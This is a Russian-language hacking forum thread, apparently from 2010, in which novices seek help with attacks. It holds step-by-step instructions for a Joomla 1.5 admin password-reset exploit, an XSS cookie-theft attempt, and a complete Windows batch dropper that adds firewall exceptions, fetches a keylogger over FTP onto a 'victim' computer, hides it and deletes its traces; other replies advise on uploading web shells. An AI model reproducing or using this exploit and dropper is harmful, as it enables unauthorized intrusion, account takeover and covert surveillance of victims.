12.12.2010, 05:13
|
|
Новичок
Регистрация: 13.05.2010
Сообщений: 0
С нами:
8419621
Репутация:
0
|
|
joomla 1.5 exploit
1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confir m
2. Write into field "token" char ' and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password
во время входа мне выдает ошибку неверный логин ???
|
|
|
12.12.2010, 05:17
|
|
Познающий
Регистрация: 10.09.2010
Сообщений: 35
С нами:
8247926
Репутация:
0
|
|
Нашел xss, выполняю:
Сообщение от None
alert(document.cookie)
В алетре только половина кукав... И этого не достаточно что бы украсть сессию. В чем может быть проблема? |
|
|
|
12.12.2010, 11:13
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Mirrey
Нашел xss, выполняю:
В алетре только половина кукав... И этого не достаточно что бы украсть сессию. В чем может быть проблема?
Наверное, некоторые куки недоступны для javascriptа, то есть они с флагом HTTP-Only
|
|
|
|
12.12.2010, 11:26
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 18
С нами:
8620247
Репутация:
0
|
|
Сообщение от wizzardl
joomla 1.5 exploit
1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confir m
2. Write into field "token" char ' and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password
во время входа мне выдает ошибку неверный логин ???
|
|
|
|
12.12.2010, 16:19
|
|
Новичок
Регистрация: 11.12.2010
Сообщений: 7
С нами:
8115446
Репутация:
0
|
|
Столкнулся с такой проблемой. Создал батник install.bat
Код:
MKDIR C:\hc
netsh firewall add allowedprogram C:\install.bat "DownloaderFTP" enable
echo download >key.txt
echo download >>key.txt
echo get inst_jasp.exe C:\hc\inst_jasp.exe >>key.txt
echo bye >>key.txt
ftp -s:C:\key.txt "ИП АДРЕС ФТП"
netsh firewall add allowedprogram C:\hc\inst_jasp.exe "Blaze" enable
attrib "C:\hc" +h
start C:\hc\inst_jasp.exe
del key.txt
del install.bat
Батник закачивает на комп жертвы кейлоггер с моего фтп. Если я запускаю у себя, то все норм, логи идут. А если на удаленном компе через cmd, то никаких логов нет =(
Проверил, файл на комп закачивает и вроде выполняет. Но, почему-то логов нет. |
|
|
|
12.12.2010, 16:31
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Darklamar
Столкнулся с такой проблемой. Создал батник install.bat
Код:
MKDIR C:\hc
netsh firewall add allowedprogram C:\install.bat "DownloaderFTP" enable
echo download >key.txt
echo download >>key.txt
echo get inst_jasp.exe C:\hc\inst_jasp.exe >>key.txt
echo bye >>key.txt
ftp -s:C:\key.txt "ИП АДРЕС ФТП"
netsh firewall add allowedprogram C:\hc\inst_jasp.exe "Blaze" enable
attrib "C:\hc" +h
start C:\hc\inst_jasp.exe
del key.txt
del install.bat
Батник закачивает на комп жертвы кейлоггер с моего фтп. Если я запускаю у себя, то все норм, логи идут. А если на удаленном компе через cmd, то никаких логов нет =(
Проверил, файл на комп закачивает и вроде выполняет. Но, почему-то логов нет. ANTIVIRUS+FIREWALL
|
|
|
|
12.12.2010, 16:34
|
|
Новичок
Регистрация: 11.12.2010
Сообщений: 7
С нами:
8115446
Репутация:
0
|
|
Антивира у него нету, фаерволла тоже (кроме стандартного, но в батнике просаны исключения)
|
|
|
|
12.12.2010, 19:03
|
|
Новичок
Регистрация: 30.01.2010
Сообщений: 0
С нами:
8569062
Репутация:
0
|
|
Подскажите пожалуйста как создать shell и как им пользоватся
|
|
|
|
12.12.2010, 19:07
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от MikePro
Подскажите пожалуйста как создать shell и как им пользоватся
ну дорогой задал ты вопрос, шелл что бы создать надо в пхп или в другом веб языке шарить, но я подозреваю что тебя интересует как залить шелл (аплоад на сервер)..для этого прочитай -ка сначала все маны по багам на ачате, но остановись на скулях поболее.и через пару эдак месяцев если понятливый будешь , то узнаешь что такое шелл и с чем его едят..а пока кури маны..
|
|
|
|
12.12.2010, 19:26
|
|
Новичок
Регистрация: 11.12.2010
Сообщений: 7
С нами:
8115446
Репутация:
0
|
|
Сообщение от MikePro
Подскажите пожалуйста как создать shell и как им пользоватся
Скинул ссылку на один шелл в пм. По теме: тебе необходимо его залить на удаленный сервер, а для этого ищи уязвимости.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
